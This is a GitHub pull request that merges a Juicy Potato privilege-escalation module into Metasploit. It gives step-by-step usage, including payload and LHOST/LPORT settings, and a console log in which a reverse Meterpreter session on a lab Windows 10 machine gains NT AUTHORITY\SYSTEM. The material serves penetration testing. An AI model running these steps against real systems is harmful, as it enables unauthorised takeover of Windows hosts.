New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Integrate Juicy Potato Privilege Escalation Exploit #11230

Merged
merged 14 commits into from Jan 16, 2019

Conversation

Projects
None yet
3 participants
@phra
Copy link
Contributor

phra commented Jan 10, 2019

This PR will:

  • fix #11229
  • make windows/local/ms16_075_reflection obsolete

For more info see:

Tested on:

  • Windows 10 1803

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Get a meterpreter session with SeImpersonatePrivilege
  • Use windows/local/ms16_075_reflection_juicy
  • Use set PAYLOAD <PAYLOAD>
  • Use set LHOST <LHOST>
  • Use set LPORT <LPORT>
  • Eventually set custom CLSID with set CLSID <CLSID>
  • exploit
  • Receive a session as impersonated user

Example with BITS CLSID (NT AUTHORITY\SYSTEM):

image

Example with UPNP CLSID (NT AUTHORITY\LOCAL SERVICE):

image

phra added some commits Jan 10, 2019

@bcoles bcoles added the module label Jan 10, 2019

@phra

This comment has been minimized.

Copy link
Contributor

phra commented Jan 10, 2019

it would be optimal to integrate an additional check regarding the Windows version of the target that should be < Windows 10 1809 in order to be vulnerable. any idea how to do it?

done.

phra added some commits Jan 10, 2019

@phra

This comment has been minimized.

Copy link
Contributor

phra commented Jan 11, 2019

the exploit was updated to spawn a meterpreter as the impersonated user removing the need for incognito module.

image

phra added some commits Jan 12, 2019

@phra

This comment has been minimized.

Copy link
Contributor

phra commented Jan 12, 2019

added an asciinema as reference:

asciicast

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Jan 15, 2019

msf5 exploit(windows/local/ms16_075_reflection_juicy) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Launching notepad to host the exploit...
[+] Process 4772 launched.
[*] Reflectively injecting the exploit DLL into 4772...
[*] Injecting exploit into 4772...
[*] Exploit injected. Injecting exploit configuration into 4772...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 192.168.56.102
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:49721) at 2019-01-15 13:23:50 -0600

meterpreter > sysinfo
Computer        : DESKTOP-K2I1LJF
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background 
[*] Backgrounding session 2...
msf5 exploit(windows/local/ms16_075_reflection_juicy) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo 
Computer        : DESKTOP-K2I1LJF
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

@busterb busterb self-assigned this Jan 15, 2019

@busterb busterb merged commit e69d509 into rapid7:master Jan 16, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Jan 16, 2019

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Jan 16, 2019

Release Notes

This adds a local privilege escalation exploit 'JuicyPotato', an improvement on ms16_075_reflection that does not require the BITS service to be enabled or port 6666 to be free.

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Jan 16, 2019

Thanks @phra

msjenkins-r7 added a commit that referenced this pull request Jan 17, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment